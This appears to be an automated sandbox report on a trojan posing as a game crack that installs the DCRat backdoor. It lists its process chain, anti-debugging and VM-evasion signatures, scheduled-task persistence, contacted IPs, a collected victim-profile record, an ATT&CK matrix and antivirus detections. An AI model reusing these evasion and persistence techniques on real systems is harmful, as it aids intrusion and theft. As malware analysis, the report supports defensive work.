            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594091
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 593979
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 593867
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData\Local
            Source: refdhcp.exe, 00000009.00000002.1930450327.000000001BD0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
            Source: wscript.exe, 00000006.00000003.1840841541.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdB
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.000000000157D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.000000000157D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994811368.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000006.00000003.1840841541.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: RDMwYUvZPK.exe, 00000028.00000002.4189749807.0000000001066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\RFAwChXSve.exeAPI call chain: ExitProcess graph end nodegraph_0-13
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeAPI call chain: ExitProcess graph end nodegraph_2-13
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeAPI call chain: ExitProcess graph end nodegraph_5-24484
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeHandle closed: DEADC0DE
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeProcess queried: DebugObjectHandleJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_009FB593 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009FB593
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_008A9D50 LoadLibraryW,GetProcAddress,3_2_008A9D50
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A1CCB1 mov eax, dword ptr fs:[00000030h]1_2_00A1CCB1
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A140EC mov ecx, dword ptr fs:[00000030h]1_2_00A140EC
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A1CCF5 mov eax, dword ptr fs:[00000030h]1_2_00A1CCF5
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A1CCB1 mov eax, dword ptr fs:[00000030h]3_2_00A1CCB1
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A140EC mov ecx, dword ptr fs:[00000030h]3_2_00A140EC
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A1CCF5 mov eax, dword ptr fs:[00000030h]3_2_00A1CCF5
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6753D mov eax, dword ptr fs:[00000030h]5_2_00B6753D
            Source: C:\Users\user\Desktop\RFAwChXSve.exeCode function: 0_2_00401AD8 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,CreateWindowExA,0_2_00401AD8
            Source: C:\Browserfont\refdhcp.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_009FB593 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009FB593
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_009E160B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_009E160B
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_009FB593 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_009FB593
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_009E160B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_009E160B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5F063 SetUnhandledExceptionFilter,5_2_00B5F063
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B5F22B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B6866F
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B5EF05
            Source: C:\Browserfont\refdhcp.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeNtProtectVirtualMemory: Indirect: 0x14082C229Jump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe" Jump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserfont\refdhcp.exe "C:\Browserfont\refdhcp.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe c:\users\user\appdata\local\temp\robloxplayerlauncher.exe --crashpad --no-rate-limit --database=c:\users\user\appdata\local\temp\crashpad_roblox --metrics-dir=c:\users\user\appdata\local\temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=robloxchannel=production --annotation=robloxgithash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=uploadattachmentkilobytelimit=100 --annotation=uploadpercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe c:\users\user\appdata\local\temp\robloxplayerlauncher.exe --crashpad --no-rate-limit --database=c:\users\user\appdata\local\temp\crashpad_roblox --metrics-dir=c:\users\user\appdata\local\temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=robloxchannel=production --annotation=robloxgithash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=uploadattachmentkilobytelimit=100 --annotation=uploadpercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4Jump to behavior
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"124406","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"124406","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"124406","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sle
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5ED5B cpuid 5_2_00B5ED5B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: GetLocaleInfoW,GetNumberFormatW,5_2_00B5A63C
            Source: C:\Browserfont\refdhcp.exeQueries volume information: C:\Browserfont\refdhcp.exe VolumeInformation
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe VolumeInformation
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_009E1C85 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_009E1C85
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4ACF5 GetVersionExW,5_2_00B4ACF5
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RDMwYUvZPK.exe PID: 5904, type: MEMORYSTR
            Source: Yara matchFile source: 00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1917392588.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: refdhcp.exe PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RDMwYUvZPK.exe PID: 1068, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RDMwYUvZPK.exe PID: 5904, type: MEMORYSTR
            Source: Yara matchFile source: 00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.4191108963.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1917392588.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: refdhcp.exe PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RDMwYUvZPK.exe PID: 1068, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            11
            Scripting
            1
            Abuse Elevation Control Mechanism
            1
            Disable or Modify Tools
            1
            Credential API Hooking
            1
            System Time Discovery
            Remote Services12
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Deobfuscate/Decode Files or Information
            2
            Input Capture
            3
            File and Directory Discovery
            Remote Desktop Protocol1
            Credential API Hooking
            1
            Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter
            1
            Scheduled Task/Job
            12
            Process Injection
            1
            Abuse Elevation Control Mechanism
            Security Account Manager338
            System Information Discovery
            SMB/Windows Admin Shares2
            Input Capture
            SteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job
            Login Hook1
            Scheduled Task/Job
            2
            Obfuscated Files or Information
            NTDS1
            Query Registry
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
            Software Packing
            LSA Secrets631
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp
            Cached Domain Credentials241
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job332
            Masquerading
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt241
            Virtualization/Sandbox Evasion
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
            Process Injection
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1449910 Sample: RFAwChXSve.exe Startdate: 31/05/2024 Architecture: WINDOWS Score: 100 89 Multi AV Scanner detection for domain / URL 2->89 91 Found malware configuration 2->91 93 Antivirus detection for URL or domain 2->93 95 13 other signatures 2->95 11 RFAwChXSve.exe 10 2->11         started        15 RDMwYUvZPK.exe 2->15         started        18 RDMwYUvZPK.exe 2->18         started        process3 dnsIp4 71 C:\Users\user\...\RobloxPlayerLauncher.exe, PE32 11->71 dropped 73 C:\Users\...\AkrienPremiumCrackByHurminka.exe, PE32 11->73 dropped 117 Creates files with lurking names (e.g. Crack.exe) 11->117 20 AkrienPremiumCrackByHurminka.exe 10 11->20         started        24 RobloxPlayerLauncher.exe 1 38 11->24         started        85 141.8.194.203 SPRINTHOSTRU Russian Federation 15->85 file5 signatures6 process7 dnsIp8 55 C:\Users\user\...\AkrienPremiumCrack.exe, PE32+ 20->55 dropped 57 C:\Users\user\AppData\...\AkrienCrack.exe, PE32 20->57 dropped 99 Antivirus detection for dropped file 20->99 101 Multi AV Scanner detection for dropped file 20->101 103 Machine Learning detection for dropped file 20->103 105 Creates files with lurking names (e.g. Crack.exe) 20->105 27 AkrienCrack.exe 3 6 20->27         started        31 AkrienPremiumCrack.exe 7 17 20->31         started        79 128.116.119.3 ROBLOX-PRODUCTIONUS United States 24->79 81 13.224.189.122 AMAZON-02US United States 24->81 83 23.201.248.158 AKAMAI-ASUS United States 24->83 59 C:\Users\user\...\RobloxPlayerLauncher.exe, PE32 24->59 dropped 61 C:\Users\user\...\RobloxPlayerLauncher[1].exe, PE32 24->61 dropped 107 Tries to detect virtualization through RDTSC time measurements 24->107 34 RobloxPlayerLauncher.exe 20 24->34         started        file9 signatures10 process11 dnsIp12 75 C:\Browserfont\refdhcp.exe, PE32 27->75 dropped 77 C:\Browserfont\ilq5gxa6sOuB.vbe, data 27->77 dropped 119 Antivirus detection for dropped file 27->119 121 Multi AV Scanner detection for dropped file 27->121 123 Machine Learning detection for dropped file 27->123 36 wscript.exe 27->36         started        87 104.21.68.54 CLOUDFLARENETUS United States 31->87 125 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 31->125 127 Tries to evade analysis by execution special instruction (VM detection) 31->127 129 Tries to detect debuggers (CloseHandle check) 31->129 131 3 other signatures 31->131 file13 signatures14 process15 signatures16 97 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->97 39 cmd.exe 36->39         started        process17 process18 41 refdhcp.exe 39->41         started        45 conhost.exe 39->45         started        file19 63 C:\Windows\en-US\RuntimeBroker.exe, PE32 41->63 dropped 65 C:\Windows\...\RDMwYUvZPK.exe, PE32 41->65 dropped 67 C:\Users\user\RDMwYUvZPK.exe, PE32 41->67 dropped 69 11 other malicious files 41->69 dropped 109 Antivirus detection for dropped file 41->109 111 Multi AV Scanner detection for dropped file 41->111 113 Machine Learning detection for dropped file 41->113 115 4 other signatures 41->115 47 schtasks.exe 41->47         started        49 schtasks.exe 41->49         started        51 schtasks.exe 41->51         started        53 26 other processes 41->53 signatures20 process21

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            RFAwChXSve.exe84%ReversingLabsWin32.Trojan.Generic
            RFAwChXSve.exe93%VirustotalBrowse
            RFAwChXSve.exe100%AviraTR/ATRAPS.Gen2
            RFAwChXSve.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\AkrienCrack.exe100%AviraVBS/Runner.VPG
            C:\Browserfont\RDMwYUvZPK.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\ilq5gxa6sOuB.vbe100%AviraVBS/Runner.VPG
            C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe100%AviraTR/ATRAPS.Gen2
            C:\Browserfont\services.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\Registry.exe100%AviraHEUR/AGEN.1323984
            C:\AkrienAntiLeak\SgrmBroker.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\RDMwYUvZPK.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\RDMwYUvZPK.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\RDMwYUvZPK.exe100%AviraHEUR/AGEN.1323984
            C:\Users\Public\Videos\cmd.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\refdhcp.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\RDMwYUvZPK.exe100%AviraHEUR/AGEN.1323984
            C:\Browserfont\RDMwYUvZPK.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\AkrienCrack.exe100%Joe Sandbox ML
            C:\Browserfont\RDMwYUvZPK.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe100%Joe Sandbox ML
            C:\Browserfont\services.exe100%Joe Sandbox ML
            C:\Browserfont\Registry.exe100%Joe Sandbox ML
            C:\AkrienAntiLeak\SgrmBroker.exe100%Joe Sandbox ML
            C:\Browserfont\RDMwYUvZPK.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe100%Joe Sandbox ML
            C:\Browserfont\RDMwYUvZPK.exe100%Joe Sandbox ML
            C:\Browserfont\RDMwYUvZPK.exe100%Joe Sandbox ML
            C:\Users\Public\Videos\cmd.exe100%Joe Sandbox ML
            C:\Browserfont\refdhcp.exe100%Joe Sandbox ML
            C:\Browserfont\RDMwYUvZPK.exe100%Joe Sandbox ML
            C:\Browserfont\RDMwYUvZPK.exe100%Joe Sandbox ML
            C:\AkrienAntiLeak\SgrmBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Browserfont\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Browserfont\Registry.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
